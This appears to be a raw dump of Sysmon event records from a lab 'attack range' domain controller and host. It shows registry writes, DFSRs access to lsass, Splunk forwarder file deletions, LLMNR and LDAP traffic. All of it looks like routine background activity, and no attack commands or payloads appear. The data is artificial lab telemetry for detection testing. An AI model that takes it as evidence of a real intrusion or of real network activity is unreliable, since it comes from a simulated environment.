13241300x8000000000000000193657Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-SetValue2022-06-03 14:15:39.771{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\634CD7B3-42FA-429E-8949-85C1FE2E997C\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_634CD7B3-42FA-429E-8949-85C1FE2E997C.XML 10341000x8000000000000000193656Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:39.755{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193655Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:39.755{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000193654Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:39.371{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C273C1604841020893EF600CD4777F9D,SHA256=845F78FC9BF651F0518F0ECD52B386E4E9767CEC93D848BE9680342B11F52571,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043780Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:40.807{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52D8EF82BABB896A91F77100B61F0678,SHA256=70FF72E75CC5AD274FA50DBE2E1D1CA4B29718B3080632159F6FE37F195266B8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000193663Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:40.609{2E1864BB-E13C-6299-0B00-000000005F02}6364748C:\Windows\system32\lsass.exe{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193662Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:40.609{2E1864BB-E13C-6299-0B00-000000005F02}6364748C:\Windows\system32\lsass.exe{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193661Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:40.609{2E1864BB-E13C-6299-0B00-000000005F02}6364748C:\Windows\system32\lsass.exe{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000193660Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:40.409{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=480C2809A0602BDC9BF0EDC39500A5EA,SHA256=AC161B6A5740A95379F6BF7DE1482B7EC5DE8970EE48C4E761B34FD2281D661B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043782Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:41.901{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC84FA0C6259C5D87FBF62E8185D7363,SHA256=8D4D6711ADEDBACA7C2957B27ECE8DE77D5304957F5F6DEB66FAAC70405C8629,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193677Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:41.740{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E25E66FF2742A46367E0C08C52DEAE52,SHA256=561601A671A09700CF3863DF6F42ECFFB89C0B4326371CBD0D76B3EC7E7918C2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000193676Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:39.794{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10e:0:0:9880:2748:5d5:ffff-65137-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x8000000000000000193675Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:39.794{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local65137-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x8000000000000000193674Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:39.794{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local54084-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x8000000000000000193673Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:39.385{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10e:0:0:9880:2748:5d5:ffff-54084-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x8000000000000000193672Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:39.385{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local54084-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x8000000000000000193671Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:39.384{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10e:0:0:9880:2748:5d5:ffff-65137-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x8000000000000000193670Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:39.384{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local65137-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x8000000000000000193669Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:39.366{2E1864BB-E13E-6299-0D00-000000005F02}912C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local56338-truefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local135epmap 354300x8000000000000000193668Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:39.366{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local56338-truefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local135epmap 10341000x8000000000000000193667Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:41.440{2E1864BB-E13C-6299-0B00-000000005F02}6363188C:\Windows\system32\lsass.exe{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193666Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:41.440{2E1864BB-E13C-6299-0B00-000000005F02}6363188C:\Windows\system32\lsass.exe{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193665Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:41.440{2E1864BB-E13C-6299-0B00-000000005F02}6363188C:\Windows\system32\lsass.exe{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000193664Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:41.440{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5CC9D1C6EE2DE1FA8E2759A86673653,SHA256=47000AF8679439BA7FB2B76E0A3DC7A34874290DE034D3A93A2181B4831B0311,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000043781Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:38.762{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52315-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000043783Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:42.995{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D47E114333F032A2E19EF5179ACF068,SHA256=71E0F1294C97AC69B99FA8E0835F4E262AEC364CCF757CE941ECC8EA9E976DA7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000193692Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:41.048{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56341-false10.0.1.14win-dc-ct-attack-range-304.attackrange.local389ldap 354300x8000000000000000193691Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:41.048{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56341-false10.0.1.14win-dc-ct-attack-range-304.attackrange.local389ldap 354300x8000000000000000193690Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:40.733{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local56340-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local389ldap 354300x8000000000000000193689Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:40.733{2E1864BB-E14E-6299-2B00-000000005F02}1040C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local56340-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local389ldap 354300x8000000000000000193688Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:40.632{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10e:0:0:9880:2748:5d5:ffff-57528-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x8000000000000000193687Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:40.632{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10e:0:0:9880:2748:5d5:ffff-52069-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x8000000000000000193686Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:40.632{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local57528-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x8000000000000000193685Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:40.226{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10e:0:0:9880:2748:5d5:ffff-52069-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x8000000000000000193684Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:40.226{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local52069-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x8000000000000000193683Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:40.226{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10e:0:0:9880:2748:5d5:ffff-57528-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x8000000000000000193682Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:40.226{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local57528-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x8000000000000000193681Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:40.217{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56339-false10.0.1.14win-dc-ct-attack-range-304.attackrange.local389ldap 354300x8000000000000000193680Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:40.217{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56339-false10.0.1.14win-dc-ct-attack-range-304.attackrange.local389ldap 354300x8000000000000000193679Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:39.794{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10e:0:0:9880:2748:5d5:ffff-54084-truee000:fc:0:0:0:0:0:0-5355llmnr 23542300x8000000000000000193678Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:42.492{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9932791C6665BC86E1F99B18AE701B88,SHA256=D97AEB21DACA252F4D3027EB9D7E7F54F1554AECC87DF74271C87EB52A256F0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193694Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:43.538{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FAA345DD1F579466776CDD4D02A886A,SHA256=6811A5BBAE40FB714CD6821A0032B3F6EAA6CC6BFBC3DAE3788FCB7A0ED115A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193693Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:43.207{2E1864BB-E1BD-6299-A700-000000005F02}4700NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=88764E49A9DB40FAC84C143D55B11D16,SHA256=B6040902613D67A5E021D6B0ACAF400FECE55CE1FD86E9E8FC5C745130E83807,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000193697Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:42.795{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56343-false10.0.1.12-8089- 354300x8000000000000000193696Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:42.734{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56342-false10.0.1.12-8000- 23542300x8000000000000000193695Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:44.586{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8CD423669D10944E5B254AFCF7AB0FE,SHA256=966600DCD0816306BF1A9126689548906E9D4570A93D4853F4216E5D7471BE02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043784Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:44.089{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49DA35374B24D7600B24F901ED3F3777,SHA256=FF01AB5C81528317EE794E682019DA02E147B1EB45C0848A2E852BA7C011DEFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193733Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.853{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21D0F078D6718D2BD9E242DD7797E30A,SHA256=244F4DFECA4244DF47831069E669BDB86291CD66F9899AD37561D7BFE58ECD4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043785Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:45.182{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2789BF65BF47B2CDB2B11AFBB2253840,SHA256=1E13107F19CA997E90D15665145D653ED2917AAA80EB8082F1F9656B133D9C0B,IMPHASH=00000000000000000000000000000000falsetrue 